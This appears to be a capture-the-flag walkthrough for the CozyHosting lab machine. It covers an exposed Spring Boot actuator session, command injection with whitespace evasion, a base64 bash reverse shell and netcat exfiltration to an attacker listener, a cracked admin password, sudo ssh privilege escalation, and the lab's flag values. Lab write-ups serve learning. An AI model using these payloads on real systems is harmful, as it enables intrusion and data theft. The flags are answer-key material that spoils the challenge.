Guided:
Q: How many TCP ports are open on CozyHosting?
A: 2

Q: The webserver on TCP port 80 issues a redirect to what domain?
A: cozyhosting.htb

Q: What relative path on the webserver returns a 500 error?
A: /error
Note: the template of the response of it revealed that the app is using spring-boot.

Q: What is the Java web framework used in the web application?
A: Spring boot

Q: What endpoint is exposed in Spring Boot and is mainly used for debugging purposes?
A: /actuator
|-> find / -name spring* 2>/dev/null
|-> /usr/share/seclists/Discovery/Web-Content/spring-boot.txt  (specific wordlist for it)

Q: What is the username of the user's whose session is exposed?
A: kanderson
The end-point that expose it: http://cozyhosting.htb/actuator/sessions

Q: When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection?
A: username
By not sending anything it show /bin/bash error, so if type ";" it will show it trying execute ssh command,
the white-space can be evaded by typing or ${IFS} or {something,like,this}|bash
so i encoded in base64 the /dev/tcp/<listener> and made sure there is no '+' with double spaces before encode.
from -> echo -n "bash  -i    >& /dev/tcp/<IP>/<PORT>     0 >&1   "|base64 -w 0
to -> YmFzaCAgLWkgICAgPiYgL2Rldi90Y3AvPElQPi88UE9SVD4gICAgIDAgPiYxICAg

Q: What user is the web application running as?
A: app

Q: What is the full path to the Java file that runs the web application?
A: /app/cloudhosting-0.0.1.jar
Transfered it to my comp via netcat, cat cloudhosting-0.0.1.jar > /dev/tcp/<IP>/<PORT>
                          my comp -> netcat -nlvp <PORT> > cloudhosting-0.0.1.jar
                extracted via 7z --> 7z x cloudhosting-0.0.1.jar

Q: What is the name of the file where application-related properties are stored in a Spring Boot application?
A: application.properties
It had postgres creds, logged in and in the 'users' table there was 2 bcrypt $2*$, Blowfish (Unix) hashes

Q: What is the admin user's password for the web application?
A: manchesterunited

Q: Submit the flag located in the josh user's home directory.
A: 695a610dde545509f72db184dcd16bbf

Q: What is the full path of the binary that the josh user can execute on the machine as root?
A: /usr/bin/ssh 
https://gtfobins.github.io/gtfobins/ssh/#sudo

Q: Submit the flag located in the root user's home directory.
A: 29c7d63e6269a919c73759dc7d093729

